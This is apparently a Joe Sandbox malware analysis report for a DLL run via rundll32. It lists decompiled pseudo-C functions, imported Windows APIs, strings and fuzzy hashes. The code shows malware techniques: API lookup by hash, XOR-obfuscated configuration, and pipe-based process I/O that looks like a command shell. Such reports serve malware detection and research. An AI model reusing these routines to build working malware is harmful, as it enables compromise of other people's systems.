				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
				r8d = 0;
				CreateMutexA(??, ??, ??);
				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
				 *(__rcx + 0x38) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
				 *_t97 = E00000001180008368;
				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				_t72 = _t129 + 7;
				if (E00000001180008368 == 0) goto 0x80003b4c;
				r8d = _t72;
				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
				goto 0x80003b4f;
				_t94 = _t129;
				 *(_t97 + 0x10) = _t94;
				if (_t94 != _t129) goto 0x80003bb0;
				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003b79;
				 *_t94();
				goto 0x80003b7b;
				if (0 != 0) goto 0x80003bd6;
				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t94 == 0) goto 0x80003ba4;
				r8d = _t72;
				 *_t94();
				goto 0x80003ba7;
				_t95 = _t129;
				 *(_t97 + 0x10) = _t95;
				if (_t95 == _t129) goto 0x80003bd6;
				_t28 = _t97 + 0x18; // 0x18
				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
				 *(_t97 + 8) = _t95;
				if (_t95 == 0) goto 0x80003bd6;
				SwitchToThread();
				goto 0x80003c03;
				_t49 = GetLastError();
				if (_t49 == 0) goto 0x80003c03;
				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
				if (r13d == 0) goto 0x80003c03;
				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
				if (_t95 == 0) goto 0x80003c03;
				 *_t95();
				return _t49;
			}

APIs

memcpy.NTDLL ref: 0000000180003A65
InitializeCriticalSection.KERNEL32 ref: 0000000180003A6E
CreateEventA.KERNEL32 ref: 0000000180003AC7
CreateEventA.KERNEL32 ref: 0000000180003AE5
CreateMutexA.KERNEL32 ref: 0000000180003B03
SwitchToThread.KERNEL32 ref: 0000000180003BCC

Part of subcall function 0000000180007950: SetEvent.KERNEL32 ref: 000000018000798D
Part of subcall function 0000000180007950: WaitForSingleObject.KERNEL32 ref: 00000001800079AA
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079B4
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079C3
Part of subcall function 0000000180007950: EnterCriticalSection.KERNEL32 ref: 00000001800079CD
Part of subcall function 0000000180007950: LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Part of subcall function 0000000180007950: Sleep.KERNEL32 ref: 0000000180007A17
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A2F
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A3E
Part of subcall function 0000000180007950: HeapFree.KERNEL32 ref: 0000000180007A51
Part of subcall function 0000000180007950: DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
String ID:
API String ID: 810493412-0
Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002B60 Relevance: 7.7, APIs: 5, Instructions: 244
memorytimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00000001180002B60(void* __esi, long long __rcx, void* __r9, void* __r10, signed long long __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t79;
				signed int _t94;
				void* _t143;
				void* _t144;
				long long _t174;
				long long* _t175;
				long long* _t178;
				void* _t180;
				long long _t182;
				void* _t190;
				intOrPtr _t211;
				void* _t224;
				long long _t225;
				long long _t228;
				void* _t229;
				void* _t255;
				signed long long _t256;

				_t256 = __r11;
				_t255 = __r10;
				_t144 = __esi;
				_t174 = _t228;
				_t229 = _t228 - 0x60;
				r12d =  *0x8000d498;
				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
				_t225 = __rcx;
				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
				if (_t79 == 0) goto 0x80002bd9;
				HeapFree(??, ??, ??);
				if (_t79 != 0) goto 0x80002f0d;
				_t190 = _t229 + 0x48;
				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
				_t182 = _t174;
				goto 0x80002c2d;
				if (_t182 == 0) goto 0x80002ec8;
				_t21 = _t225 + 0xb0; // 0xb0
				 *((long long*)(_t229 + 0x28)) = _t182;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
				_t175 =  *((intOrPtr*)(_t225 + 0x28));
				 *((long long*)(_t229 + 0x40)) = _t175;
				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
				goto 0x80002cb8;
				 *(_t229 + 0xa8) = 0;
				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				r15d = 0x7f;
				if (_t175 == 0) goto 0x80002cec;
				r9d = 0;
				r8d = 0;
				 *_t175();
				goto 0x80002cef;
				if (r15d != 0x102) goto 0x80002ec8;
				 *(_t225 + 0x64) = 0x3e8;
				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
				r9d = 0;
				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
				_t94 =  *(_t229 + 0xa8);
				if (_t94 == 0) goto 0x80002d8f;
				 *(_t225 + 0x64) = _t94 * 0x3e8;
				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
				goto 0x80002ddb;
				 *(_t229 + 0xa8) = 0;
				r12d = r12d ^ 0xe5c7ba87;
				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
				GetSystemTimeAsFileTime(??);
				r11d =  *((intOrPtr*)(_t229 + 0xb8));
				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
				 *((long long*)(_t225 + 0x58)) = _t178;
				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
				r8d =  *((intOrPtr*)(_t229 + 0x30));
				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t178 == 0) goto 0x80002e97;
				r8d = 0;
				r9d = 0;
				r9d = r9d * 0x3e8;
				 *_t178();
				goto 0x80002e9a;
				_t143 = r15d;
				if (_t143 != 0) goto 0x80002e40;
				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
				HeapFree(??, ??, ??);
				E00000001180002620();
				_t211 =  *0x8000d4a0;
				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
				HeapFree(??, ??, ??);
				asm("lock inc ecx");
				return _t143;
			}

APIs

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
HeapFree.KERNEL32 ref: 0000000180002EC2
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Free$Heap$LibraryTime$FileLoadSystem
String ID:
API String ID: 1415693639-0
Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE35481030 Relevance: 36.8, APIs: 1, Strings: 20, Instructions: 94COMMON

Download Yara Rule

APIs

SetConsoleTextAttribute.KERNEL32 ref: 00007FFE3548125E

Strings

a, xrefs: 00007FFE35481205
<, xrefs: 00007FFE3548110C
f, xrefs: 00007FFE3548103A
T, xrefs: 00007FFE3548114B
V, xrefs: 00007FFE35481124
G, xrefs: 00007FFE3548108C
+, xrefs: 00007FFE354810A4
F, xrefs: 00007FFE35481130
U, xrefs: 00007FFE3548113A
0, xrefs: 00007FFE3548105E
@, xrefs: 00007FFE35481216
(, xrefs: 00007FFE3548117B
S, xrefs: 00007FFE35481113
), xrefs: 00007FFE35481163
p, xrefs: 00007FFE35481098
&, xrefs: 00007FFE35481046
b, xrefs: 00007FFE35481052
P, xrefs: 00007FFE3548116A
U, xrefs: 00007FFE35481152
U, xrefs: 00007FFE35481075

Memory Dump Source

Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true

Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd

Similarity

API ID: AttributeConsoleText
String ID: &$($)$+$0$<$@$F$G$P$S$T$U$U$U$V$a$b$f$p
API String ID: 646522457-3871696196
Opcode ID: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
Instruction ID: c3b09f64314ecbb0240905c6f5f7e06ab2b0d6cd3abd21b140db4b14cfcacf30
Opcode Fuzzy Hash: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
Instruction Fuzzy Hash: 1851F47280C3C2C5F3158364A85C33FAE919762B49F151077E2CB45AEAD6AEF148FB16

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008368 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154filepipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 000000018000839A
ResumeThread.KERNEL32 ref: 00000001800083EE
GetExitCodeProcess.KERNEL32 ref: 00000001800083FD
PeekNamedPipe.KERNEL32 ref: 0000000180008437
ReadFile.KERNEL32 ref: 0000000180008465
WriteFile.KERNEL32 ref: 00000001800084DC
WaitForMultipleObjects.KERNEL32 ref: 0000000180008500
WriteFile.KERNEL32 ref: 0000000180008567
ResetEvent.KERNEL32 ref: 0000000180008576
GetLastError.KERNEL32 ref: 000000018000858B
GetLastError.KERNEL32 ref: 0000000180008598
CloseHandle.KERNEL32 ref: 00000001800085AA

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Strings

.RK, xrefs: 000000018000851D

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
String ID: .RK
API String ID: 1606758550-3354657194
Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800031D4 Relevance: 18.1, APIs: 12, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180006A84: HeapAlloc.KERNEL32 ref: 0000000180006B46
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B78
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B86

lstrlenA.KERNEL32(00000000,0000000180006466), ref: 0000000180003221
HeapAlloc.KERNEL32 ref: 0000000180003239
memcpy.NTDLL ref: 0000000180003259
lstrcpyA.KERNEL32 ref: 0000000180003265
lstrlenA.KERNEL32 ref: 000000018000326E

Part of subcall function 0000000180001208: EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
Part of subcall function 0000000180001208: LeaveCriticalSection.KERNEL32 ref: 0000000180001265
Part of subcall function 0000000180001208: HeapAlloc.KERNEL32 ref: 000000018000129C

HeapFree.KERNEL32 ref: 000000018000329E

Part of subcall function 000000018000467C: HeapAlloc.KERNEL32 ref: 00000001800046D2

HeapAlloc.KERNEL32 ref: 0000000180003316
UrlEscapeA.SHLWAPI ref: 0000000180003335
HeapFree.KERNEL32 ref: 0000000180003358
HeapFree.KERNEL32 ref: 000000018000336D
HeapFree.KERNEL32 ref: 000000018000337D
HeapFree.KERNEL32 ref: 000000018000338B

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
String ID:
API String ID: 1109037607-0
Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007950 Relevance: 18.1, APIs: 12, Instructions: 78sleepmemorysynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 000000018000798D
WaitForSingleObject.KERNEL32 ref: 00000001800079AA
CloseHandle.KERNEL32 ref: 00000001800079B4
CloseHandle.KERNEL32 ref: 00000001800079C3
EnterCriticalSection.KERNEL32 ref: 00000001800079CD
LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Sleep.KERNEL32 ref: 0000000180007A03
Sleep.KERNEL32 ref: 0000000180007A17
CloseHandle.KERNEL32 ref: 0000000180007A2F
CloseHandle.KERNEL32 ref: 0000000180007A3E
HeapFree.KERNEL32 ref: 0000000180007A51
DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
String ID:
API String ID: 2177250193-0
Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A6EC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000018000A783
LoadLibraryA.KERNEL32 ref: 000000018000A829
GetLastError.KERNEL32 ref: 000000018000A837
RaiseException.KERNEL32 ref: 000000018000A87F

Strings

H, xrefs: 000000018000A710

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: H
API String ID: 948315288-2852464175
Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE354812E9 Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 33COMMON

Download Yara Rule

APIs

FlushConsoleInputBuffer.KERNEL32 ref: 00007FFE354813A6

Strings

p, xrefs: 00007FFE35481398
G, xrefs: 00007FFE3548137F
f, xrefs: 00007FFE35481349
b, xrefs: 00007FFE35481301
&, xrefs: 00007FFE35481355
U, xrefs: 00007FFE354813BA
4, xrefs: 00007FFE3548134E
A, xrefs: 00007FFE3548135A
F, xrefs: 00007FFE354812F5

Memory Dump Source

Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true

Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd

Similarity

API ID: BufferConsoleFlushInput
String ID: &$4$A$F$G$U$b$f$p
API String ID: 320419523-419958901
Opcode ID: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
Instruction ID: 0d9c995824fcc9ca03b58b798c7f2a4c49cf89718e3dfcc85be87e6cd0c2790d
Opcode Fuzzy Hash: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
Instruction Fuzzy Hash: 6611B262C1C7C285F3664324A45C33F6E908753B08F1920A7E3C705EDAD6AFD548AB13

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000431C Relevance: 16.7, APIs: 11, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				void* _v56;
				void* _v72;
				void* __rdi;
				void* __rsi;
				long _t75;
				signed long long _t121;
				signed long long _t122;
				intOrPtr* _t124;
				void* _t151;
				void* _t158;
				void* _t172;

				_t162 = __rbp;
				_t121 = __rax;
				_a24 = __rbx;
				_a32 = __rbp;
				_t161 =  *0x8000d4a0;
				_t124 = __rcx;
				r14d = 0;
				WaitForSingleObject(??, ??);
				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x80004372;
				 *_t121();
				_t151 = __rcx + 0x4c;
				r8d = 0x10;
				memcpy(??, ??, ??);
				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x800043a9;
				_t10 = _t151 + 1; // 0x2
				_t11 = _t151 + 5; // 0x6
				r8d = _t11;
				 *_t121();
				goto 0x800043ad;
				_t122 = _t121 | 0xffffffff;
				 *(__rcx + 0x10) = _t122;
				if (_t122 == 0xffffffff) goto 0x8000444d;
				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t122 == _t172) goto 0x800043e0;
				r8d = 0x10;
				 *_t122();
				goto 0x800043e3;
				if (r14d != r14d) goto 0x80004435;
				r8d = 1;
				_a8 = r14w;
				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
				SetEvent(??);
				r9d = _a8 & 0x0000ffff;
				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
				goto 0x8000447e;
				if (GetLastError() == r14d) goto 0x80004481;
				E00000001180008308(_t122, _t124, _t124 + 0x10);
				goto 0x80004455;
				if (GetLastError() == r14d) goto 0x80004481;
				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
				ResetEvent(??);
				WaitForSingleObject(??, ??);
				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
				goto 0x80004570;
				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
				if (_t122 == _t172) goto 0x800044be;
				r8d = 0x10;
				 *_t122();
				goto 0x800044c1;
				if (r14d != r14d) goto 0x80004568;
				_a16 = 0x10;
				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x800044f2;
				 *_t122();
				goto 0x800044f5;
				if (r14d != r14d) goto 0x80004568;
				SetEvent(??);
				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x8000452c;
				 *_t122();
				goto 0x80004530;
				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
				r9d = 0;
				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x80004504;
				 *_t122();
				goto 0x80004504;
				_t75 = GetLastError();
				ReleaseMutex(??);
				asm("lock add dword [esi+0x38], 0xffffffff");
				return _t75;
			}

APIs

WaitForSingleObject.KERNEL32 ref: 0000000180004349
memcpy.NTDLL ref: 0000000180004381
SetEvent.KERNEL32 ref: 0000000180004410
GetLastError.KERNEL32 ref: 0000000180004435
ResetEvent.KERNEL32 ref: 0000000180004465
WaitForSingleObject.KERNEL32 ref: 0000000180004478
WaitForSingleObject.KERNEL32 ref: 0000000180004487
SetEvent.KERNEL32 ref: 00000001800044FE
GetLastError.KERNEL32 ref: 0000000180004568
ReleaseMutex.KERNEL32 ref: 0000000180004574

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
String ID:
API String ID: 1434584367-0
Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705

Uniqueness

Uniqueness Score: -1.00%

